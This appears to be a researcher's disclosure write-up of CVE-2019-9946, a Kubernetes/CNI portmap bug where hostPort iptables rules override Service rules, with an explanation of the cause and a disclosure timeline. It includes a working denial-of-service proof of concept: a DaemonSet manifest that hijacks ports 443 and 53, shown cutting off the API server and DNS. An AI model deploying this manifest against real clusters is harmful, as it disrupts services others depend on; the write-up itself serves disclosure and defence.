When I first discovered this bug, I opened issue #72522 on the Kubernetes repo without thinking much about the security implications.
Fast forward 4 days and some more testing later, and I found out that using hostPort allowed intercepting not only LoadBalancer traffic, as initially reported, but any Service traffic, so I reported it to [email protected].
To clearly show the issue, I sent this trivial denial of service proof of concept:
# curl https://10.233.0.1:443/api -k
{
"kind": "APIVersions",
"versions": [
...
# kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: dosk8s-ds
spec:
  selector:
    matchLabels:
      app: dosk8s
  template:
    metadata:
      labels:
        app: dosk8s
    spec:
      containers:
      - name: pause
        image: k8s.gcr.io/pause
        ports:
        - name: dos443
          containerPort: 443
          hostPort: 443
        - name: dos53t
          containerPort: 53
          hostPort: 53
        - name: dos53u
          containerPort: 53
          hostPort: 53
          protocol: UDP
EOF
# curl https://10.233.0.1:443/api -k
curl: (7) Failed connect to 10.233.0.1:443; Connection refused
# nslookup google.com
nslookup: can't resolve '(null)': Name does not resolve
nslookup: can't resolve 'google.com': Try again
In the end, the issue was in the CNI (Container Network Interface) portmap plugin, which was inserting its iptables rules instead of appending them, so they took precedence over the Kubernetes Services rules.
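To make the ordering concrete, here is a simplified sketch of the two jump rules in the nat PREROUTING chain. The chain names (KUBE-SERVICES for kube-proxy, CNI-HOSTPORT-DNAT for the portmap plugin) are the real ones, but the comments and exact matches below are illustrative, not the plugins' literal rules:

# kube-proxy appends its Services jump at the end of the chain
iptables -t nat -A PREROUTING -m comment --comment "kubernetes service portals" -j KUBE-SERVICES
# the buggy portmap plugin inserted its hostPort jump at position 1, ahead of KUBE-SERVICES
iptables -t nat -I PREROUTING 1 -m comment --comment "CNI hostport dnat" -j CNI-HOSTPORT-DNAT

With that ordering, the hostPort 443 DNAT matches traffic destined to the apiserver ClusterIP before the Service rules are ever evaluated, which is exactly what the proof of concept exploits; the fix is essentially to append (-A) the jump instead of inserting (-I) it. On a node you can check the ordering with iptables -t nat -nL PREROUTING --line-numbers.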
- 2019-01-03: Initial public bug report.
- 2019-01-07: Initial private bug report to [email protected].
- 2019-01-17: The networking team can reproduce the issue but is still investigating.
- 2019-02-27: The networking team believes the issue is in CNI only. The CNI developers have proposed a fix that is being reviewed. I ask if there is already a CVE for this bug.
- 2019-03-19: The networking team is testing a new version of the CNI plugin. The Kubernetes security team can't issue a CVE for CNI, and CNI can't issue CVEs yet, so this is still a work in progress.
- 2019-03-25: CVE-2019-9946 has been reserved for this issue.
- 2019-03-28: Public disclosure.